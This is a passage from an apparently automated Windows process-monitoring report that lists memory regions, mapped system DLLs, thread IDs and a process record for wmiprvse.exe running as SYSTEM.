	            name = "dhcpcore6.dll"
	        filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")

Region:
	              id = 2284
	        start_va = 0x7ffc0c490000
	          end_va = 0x7ffc0c4ecfff
	     entry_point = 0x7ffc0c490000
	     region_type = mapped_file
	            name = "dhcpcore.dll"
	        filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")

Region:
	              id = 2285
	        start_va = 0x7ffc0c4f0000
	          end_va = 0x7ffc0c509fff
	     entry_point = 0x7ffc0c4f0000
	     region_type = mapped_file
	            name = "dhcpcsvc.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")

Region:
	              id = 2286
	        start_va = 0x7ffc0c510000
	          end_va = 0x7ffc0c525fff
	     entry_point = 0x7ffc0c510000
	     region_type = mapped_file
	            name = "dhcpcsvc6.dll"
	        filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")

Region:
	              id = 2287
	        start_va = 0x7ffc0c530000
	          end_va = 0x7ffc0c567fff
	     entry_point = 0x7ffc0c530000
	     region_type = mapped_file
	            name = "wcmcsp.dll"
	        filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll")

Region:
	              id = 2288
	        start_va = 0x7ffc0c770000
	          end_va = 0x7ffc0c808fff
	     entry_point = 0x7ffc0c770000
	     region_type = mapped_file
	            name = "wcmsvc.dll"
	        filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll")

Region:
	              id = 2289
	        start_va = 0x7ffc0c8d0000
	          end_va = 0x7ffc0c907fff
	     entry_point = 0x7ffc0c8d0000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")

Region:
	              id = 2290
	        start_va = 0x7ffc0efd0000
	          end_va = 0x7ffc0f105fff
	     entry_point = 0x7ffc0efd0000
	     region_type = mapped_file
	            name = "wintypes.dll"
	        filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")

Region:
	              id = 2291
	        start_va = 0x7ffc0f200000
	          end_va = 0x7ffc0f2c7fff
	     entry_point = 0x7ffc0f200000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")

Region:
	              id = 2292
	        start_va = 0x7ffc0f4d0000
	          end_va = 0x7ffc0f5dafff
	     entry_point = 0x7ffc0f4d0000
	     region_type = mapped_file
	            name = "audiosrv.dll"
	        filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")

Region:
	              id = 2293
	        start_va = 0x7ffc0f660000
	          end_va = 0x7ffc0f6a9fff
	     entry_point = 0x7ffc0f660000
	     region_type = mapped_file
	            name = "deviceaccess.dll"
	        filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")

Region:
	              id = 2294
	        start_va = 0x7ffc0fa30000
	          end_va = 0x7ffc0fa9ffff
	     entry_point = 0x7ffc0fa30000
	     region_type = mapped_file
	            name = "mmdevapi.dll"
	        filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")

Region:
	              id = 2295
	        start_va = 0x7ffc0fbb0000
	          end_va = 0x7ffc0fbc0fff
	     entry_point = 0x7ffc0fbb0000
	     region_type = mapped_file
	            name = "wmiclnt.dll"
	        filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")

Region:
	              id = 2296
	        start_va = 0x7ffc0ff80000
	          end_va = 0x7ffc0ff97fff
	     entry_point = 0x7ffc0ff80000
	     region_type = mapped_file
	            name = "nlaapi.dll"
	        filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")

Region:
	              id = 2297
	        start_va = 0x7ffc10250000
	          end_va = 0x7ffc10400fff
	     entry_point = 0x7ffc10250000
	     region_type = mapped_file
	            name = "wevtsvc.dll"
	        filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")

Region:
	              id = 2298
	        start_va = 0x7ffc10d10000
	          end_va = 0x7ffc10d18fff
	     entry_point = 0x7ffc10d10000
	     region_type = mapped_file
	            name = "nrpsrv.dll"
	        filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")

Region:
	              id = 2299
	        start_va = 0x7ffc10d20000
	          end_va = 0x7ffc10d2afff
	     entry_point = 0x7ffc10d20000
	     region_type = mapped_file
	            name = "lmhsvc.dll"
	        filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")

Region:
	              id = 2300
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 2301
	        start_va = 0x7ffc120e0000
	          end_va = 0x7ffc120f2fff
	     entry_point = 0x7ffc120e0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 2302
	        start_va = 0x7ffc12440000
	          end_va = 0x7ffc12466fff
	     entry_point = 0x7ffc12440000
	     region_type = mapped_file
	            name = "devobj.dll"
	        filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")

Region:
	              id = 2303
	        start_va = 0x7ffc12490000
	          end_va = 0x7ffc12539fff
	     entry_point = 0x7ffc12490000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")

Region:
	              id = 2304
	        start_va = 0x7ffc127a0000
	          end_va = 0x7ffc127d1fff
	     entry_point = 0x7ffc127a0000
	     region_type = mapped_file
	            name = "fwbase.dll"
	        filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")

Region:
	              id = 2305
	        start_va = 0x7ffc12a20000
	          end_va = 0x7ffc12a43fff
	     entry_point = 0x7ffc12a20000
	     region_type = mapped_file
	            name = "gpapi.dll"
	        filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")

Region:
	              id = 2306
	        start_va = 0x7ffc12bc0000
	          end_va = 0x7ffc12cb3fff
	     entry_point = 0x7ffc12bc0000
	     region_type = mapped_file
	            name = "ucrtbase.dll"
	        filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")

Region:
	              id = 2307
	        start_va = 0x7ffc12e30000
	          end_va = 0x7ffc12e3bfff
	     entry_point = 0x7ffc12e30000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")

Region:
	              id = 2308
	        start_va = 0x7ffc13180000
	          end_va = 0x7ffc1319efff
	     entry_point = 0x7ffc13180000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")

Region:
	              id = 2309
	        start_va = 0x7ffc132f0000
	          end_va = 0x7ffc1334bfff
	     entry_point = 0x7ffc132f0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")

Region:
	              id = 2310
	        start_va = 0x7ffc134c0000
	          end_va = 0x7ffc134cafff
	     entry_point = 0x7ffc134c0000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")

Region:
	              id = 2311
	        start_va = 0x7ffc136a0000
	          end_va = 0x7ffc136ccfff
	     entry_point = 0x7ffc136a0000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")

Region:
	              id = 2312
	        start_va = 0x7ffc13830000
	          end_va = 0x7ffc13885fff
	     entry_point = 0x7ffc13830000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 2313
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 2314
	        start_va = 0x7ffc13a20000
	          end_va = 0x7ffc13a33fff
	     entry_point = 0x7ffc13a20000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 2315
	        start_va = 0x7ffc13a40000
	          end_va = 0x7ffc13a8afff
	     entry_point = 0x7ffc13a40000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 2316
	        start_va = 0x7ffc13a90000
	          end_va = 0x7ffc13a9ffff
	     entry_point = 0x7ffc13a90000
	     region_type = mapped_file
	            name = "msasn1.dll"
	        filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")

Region:
	              id = 2317
	        start_va = 0x7ffc13aa0000
	          end_va = 0x7ffc13aaefff
	     entry_point = 0x7ffc13aa0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 2318
	        start_va = 0x7ffc13b60000
	          end_va = 0x7ffc13be5fff
	     entry_point = 0x7ffc13b60000
	     region_type = mapped_file
	            name = "firewallapi.dll"
	        filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")

Region:
	              id = 2319
	        start_va = 0x7ffc142c0000
	          end_va = 0x7ffc14486fff
	     entry_point = 0x7ffc142c0000
	     region_type = mapped_file
	            name = "crypt32.dll"
	        filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")

Region:
	              id = 2320
	        start_va = 0x7ffc14490000
	          end_va = 0x7ffc144d2fff
	     entry_point = 0x7ffc14490000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 2321
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2322
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2323
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 2324
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2325
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2326
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2327
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2328
	        start_va = 0x7ffc16550000
	          end_va = 0x7ffc165f6fff
	     entry_point = 0x7ffc16550000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 2329
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2330
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 2331
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2332
	        start_va = 0x7ffc16fa0000
	          end_va = 0x7ffc16fa7fff
	     entry_point = 0x7ffc16fa0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")

Region:
	              id = 2333
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 2334
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2335
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2336
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")


Thread:
	id = 209
	os_tid = 0xda0


Thread:
	id = 210
	os_tid = 0xa4


Thread:
	id = 211
	os_tid = 0xe64


Thread:
	id = 212
	os_tid = 0xdb4


Thread:
	id = 213
	os_tid = 0xde8


Thread:
	id = 214
	os_tid = 0x8b0


Thread:
	id = 215
	os_tid = 0xb7c


Thread:
	id = 216
	os_tid = 0x474


Thread:
	id = 217
	os_tid = 0x440


Thread:
	id = 218
	os_tid = 0x43c


Thread:
	id = 219
	os_tid = 0x438


Thread:
	id = 220
	os_tid = 0x430


Thread:
	id = 221
	os_tid = 0x41c


Thread:
	id = 222
	os_tid = 0x294


Thread:
	id = 223
	os_tid = 0x2a0


Thread:
	id = 224
	os_tid = 0x154


Thread:
	id = 225
	os_tid = 0x3e0


Thread:
	id = 226
	os_tid = 0x3dc


Thread:
	id = 227
	os_tid = 0x3d8


Thread:
	id = 228
	os_tid = 0x3c0


Thread:
	id = 229
	os_tid = 0x3b4


Thread:
	id = 230
	os_tid = 0x34c


Thread:
	id = 252
	os_tid = 0xcb4


Thread:
	id = 253
	os_tid = 0xcb0


Thread:
	id = 254
	os_tid = 0xd18


Thread:
	id = 255
	os_tid = 0xd28


Thread:
	id = 256
	os_tid = 0xd30


Process:
	id = "13"
	image_name = "wmiprvse.exe"
	filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
	page_root = "0x2e2be000"
	os_pid = "0xce0"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "rpc_server"
	parent_id = "5"
	os_parent_pid = "0x3b8"
	cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xe], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cb16" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]

Region:
	              id = 2375
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 2376
	        start_va = 0x5a9e960000
	          end_va = 0x5a9e9dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9e960000"
	        filename = ""

Region:
	              id = 2377
	        start_va = 0x5a9ea00000
	          end_va = 0x5a9ebfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ea00000"
	        filename = ""

Region:
	              id = 2378
	        start_va = 0x1e917720000
	          end_va = 0x1e91773ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e917720000"
	        filename = ""

Region:
	              id = 2379
	        start_va = 0x1e917740000
	          end_va = 0x1e917754fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917740000"
	        filename = ""

Region:
	              id = 2380
	        start_va = 0x1e917760000
	          end_va = 0x1e917763fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917760000"
	        filename = ""

Region:
	              id = 2381
	        start_va = 0x1e917770000
	          end_va = 0x1e917770fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917770000"
	        filename = ""

Region:
	              id = 2382
	        start_va = 0x1e917780000
	          end_va = 0x1e917781fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e917780000"
	        filename = ""

Region:
	              id = 2383
	        start_va = 0x7df5ff800000
	          end_va = 0x7ff5ff7fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff800000"
	        filename = ""

Region:
	              id = 2384
	        start_va = 0x7ff66eb20000
	          end_va = 0x7ff66eb42fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66eb20000"
	        filename = ""

Region:
	              id = 2385
	        start_va = 0x7ff66f170000
	          end_va = 0x7ff66f1effff
	     entry_point = 0x7ff66f170000
	     region_type = mapped_file
	            name = "wmiprvse.exe"
	        filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")

Region:
	              id = 2386
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 2387
	        start_va = 0x1e9177b0000
	          end_va = 0x1e9178affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e9177b0000"
	        filename = ""

Region:
	              id = 2388
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 2389
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 2390
	        start_va = 0x5a9ec00000
	          end_va = 0x5a9ec7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ec00000"
	        filename = ""

Region:
	              id = 2391
	        start_va = 0x1e917720000
	          end_va = 0x1e91772ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917720000"
	        filename = ""

Region:
	              id = 2392
	        start_va = 0x1e917730000
	          end_va = 0x1e917736fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e917730000"
	        filename = ""

Region:
	              id = 2393
	        start_va = 0x1e917790000
	          end_va = 0x1e917796fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e917790000"
	        filename = ""

Region:
	              id = 2394
	        start_va = 0x1e9178b0000
	          end_va = 0x1e91796dfff
	     entry_point = 0x1e9178b0000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 2395
	        start_va = 0x1e9179e0000
	          end_va = 0x1e9179effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e9179e0000"
	        filename = ""

Region:
	              id = 2396
	        start_va = 0x7ff66ea20000
	          end_va = 0x7ff66eb1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff66ea20000"
	        filename = ""

Region:
	              id = 2397
	        start_va = 0x7ffc06260000
	          end_va = 0x7ffc06275fff
	     entry_point = 0x7ffc06260000
	     region_type = mapped_file
	            name = "ncobjapi.dll"
	        filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")

Region:
	              id = 2398
	        start_va = 0x7ffc06430000
	          end_va = 0x7ffc06525fff
	     entry_point = 0x7ffc06430000
	     region_type = mapped_file
	            name = "fastprox.dll"
	        filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")

Region:
	              id = 2399
	        start_va = 0x7ffc07e60000
	          end_va = 0x7ffc07edefff
	     entry_point = 0x7ffc07e60000
	     region_type = mapped_file
	            name = "wbemcomn.dll"
	        filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")

Region:
	              id = 2400
	        start_va = 0x7ffc13950000
	          end_va = 0x7ffc13978fff
	     entry_point = 0x7ffc13950000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")

Region:
	              id = 2401
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 2402
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 2403
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 2404
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 2405
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 2406
	        start_va = 0x7ffc16970000
	          end_va = 0x7ffc169dafff
	     entry_point = 0x7ffc16970000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")

Region:
	              id = 2407
	        start_va = 0x7ffc16250000
	          end_va = 0x7ffc162f6fff
	     entry_point = 0x7ffc16250000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 2408
	        start_va = 0x1e9177a0000
	          end_va = 0x1e9177a0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e9177a0000"
	        filename = ""

Region:
	              id = 2409
	        start_va = 0x1e917970000
	          end_va = 0x1e917970fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000001e917970000"
	        filename = ""

Region:
	              id = 2410
	        start_va = 0x1e9179f0000
	          end_va = 0x1e917d26fff
	     entry_point = 0x1e9179f0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 2411
	        start_va = 0x1e917d30000
	          end_va = 0x1e917eb7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917d30000"
	        filename = ""

Region:
	              id = 2412
	        start_va = 0x1e917ec0000
	          end_va = 0x1e918040fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e917ec0000"
	        filename = ""

Region:
	              id = 2413
	        start_va = 0x1e918050000
	          end_va = 0x1e91810ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001e918050000"
	        filename = ""

Region:
	              id = 2414
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 2415
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 2416
	        start_va = 0x5a9ec80000
	          end_va = 0x5a9ecfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ec80000"
	        filename = ""

Region:
	              id = 2417
	        start_va = 0x5a9ed00000
	          end_va = 0x5a9ed7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ed00000"
	        filename = ""

Region:
	              id = 2418
	        start_va = 0x5a9ed80000
	          end_va = 0x5a9edfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ed80000"
	        filename = ""

Region:
	              id = 2419
	        start_va = 0x5a9ee00000
	          end_va = 0x5a9ee7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005a9ee00000"
	        filename = ""

Region:
	              id = 2420
